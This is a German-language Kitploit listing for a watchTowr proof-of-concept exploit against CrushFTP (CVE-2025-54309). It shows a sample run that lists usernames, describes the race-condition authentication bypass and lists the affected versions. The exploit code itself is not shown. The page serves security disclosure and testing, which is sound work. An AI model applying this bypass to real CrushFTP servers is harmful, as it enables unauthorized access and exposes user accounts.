Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309 — Proof-of-Concept-Exploit für CVE-2025-54309, der eine Authentifizierungsumgehung mittels Race Condition in CrushFTP WebInterface demonstriert, um Benutzer aufzulisten. | Kitploit
Tools/GitHubGitHub/watchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309
SchwachstellenanalyseExploitationInformationsbeschaffungWebsicherheitPenetrationstestsAuthentifizierung
GitHubwatchtowrlabs/watchtowr-vs-crushftp-authentication-bypass-cve-2025-54309

watchTowr-vs-CrushFTP-Authentication-Bypass-CVE-2025-54309

Proof-of-Concept-Exploit für CVE-2025-54309, der eine Authentifizierungsumgehung mittels Race Condition in CrushFTP WebInterface demonstriert, um Benutzer aufzulisten.

Repository anzeigen
2832vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-54309

Ein Proof of Concept zur Authentifizierungsumgehung von CrushFTP

Technische Details finden Sie in unserem Blogbeitrag

Erkennung in Aktion

root@kitploit:~
python3 watchTowr-vs-CrushFTP-CVE-2025-54309.py http://127.0.0.1:8082
[*] Generated new c2f value: 6XDQ
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchTowr-vs-CrushFTP-CVE-2025-54309.py
        (*) CrushFTP Authentication Bypass Race Condition PoC
        
          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2025-54309]
        
[*] CRUSHFTP RACE CONDITION POC
[*] TARGET: http://127.0.0.1:8082
[*] ENDPOINT: CrushFTP WebInterface getUserList
[*] ATTACK: 5000 requests with new c2f every 50 requests
============================================================
Starting race with 5000 request pairs...
============================================================
[*] Generated new c2f value: qUwd
[*] NEW SESSION: c2f=qUwd
[*] EXFILTRATED 3 USERS: crushadmin, default, TempAccount
[*] VULNERABLE! RACE CONDITION POSSIBLE!

Beschreibung

Dieses Skript ist ein Proof of Concept für CVE-2025-54309 gegen CrushFTP-Schnittstellen. Durch die Erstellung einer Reihe von Race-Anfragen, die dieselben Sitzungskennungen verwenden, einer Anfrage zum Setzen der Benutzernamenseigenschaft auf »crushadmin« und einer Anfrage zur Ausführung eines authentifizierten Befehls als dieser Benutzer, ist es in diesem PoC möglich, die Liste der Benutzernamen zu extrahieren. Weitere Details finden Sie in unserem [Blogbeitrag] (https://labs.watchtowr.com/).

Betroffene Versionen

  • vor 10.8.5
  • 11 vor 11.3.4_23

Weitere Details im CrushFTP Advisory

Folgen Sie watchTowr Labs

Für die neuesten Sicherheitsforschungen folgen Sie dem watchTowr Labs-Team

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
Tool herunterladen